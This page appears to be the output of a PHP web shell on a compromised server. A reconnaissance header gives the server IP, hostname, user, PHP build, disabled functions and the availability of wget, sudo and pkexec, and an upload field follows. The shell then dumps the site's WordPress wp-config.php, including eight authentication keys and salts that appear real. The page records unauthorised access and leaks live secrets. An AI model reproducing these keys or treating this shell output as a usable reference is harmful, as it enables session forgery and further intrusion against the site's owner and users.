| Server IP : 95.46.96.79 / Your IP : 216.73.216.84 Web Server : Apache/2.4.41 (Ubuntu) System : Linux zaimer.uz 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : akslabs_uz_usr ( 1001) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/self/cwd/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
require_once __DIR__ . '/vendor/autoload.php';
// Load environment variables from the .env file
$dotenv = Dotenv\Dotenv::createImmutable(__DIR__);
$dotenv->load();
define( 'DB_NAME', $_ENV['DB_NAME'] );
define( 'DB_USER', $_ENV['DB_USER'] );
define( 'DB_PASSWORD', $_ENV['DB_PASSWORD'] );
define( 'DB_HOST', $_ENV['DB_HOST'] );
define( 'DB_CHARSET', $_ENV['DB_CHARSET'] );
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'm6hX#z#mcJm]%I|{7nT98_QdO<_Ovn=o-UUb76?LusSL`a+d:DG` %0LK<y`kqfA' );
define( 'SECURE_AUTH_KEY', 'Au]X-j19[D$RCrd-EXof&vRw@?]B9cWZ@Wfq)|on>9tS&TpPf|)W8S;:Rrm;>Zei' );
define( 'LOGGED_IN_KEY', 'jr?DHn?lptD#Tf6u 4khJ@d;@+Nf6{fzVT61ydU5Z$]Tb=yA}*_]j]$F1<8h;_;e' );
define( 'NONCE_KEY', 'Mm$dCX*cI!`-;0VAExrx/oI?=TN&DVr^Oxsz~~x>+RFLjj:iJPu6N~bs<O?;DCI{' );
define( 'AUTH_SALT', '@k.?$&%yEe>%ybc_gUhH[P$|vBIbZvz63DwBiPsmdG:9/T.rpW77g(kr&a3P]%nx' );
define( 'SECURE_AUTH_SALT', 'TiWl<8vaCVCZ.(P_!;^1(lH^U?t<*gGS&3#z=-b%nkS<q@BzT?1< ZauUY 4x>&D' );
define( 'LOGGED_IN_SALT', 'dRZ<MyX/*d/Y=BAw kS7abu#7|# DpkTBC4PkJmm5@8m&<bsXzSZ,K.&wAm~:)b8' );
define( 'NONCE_SALT', '=w pq^56{.,K{6 PVocU_+h,{BGX?a}AUuUy(b8W46XlhS5GxEI6Zr>{=D.hvln|' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';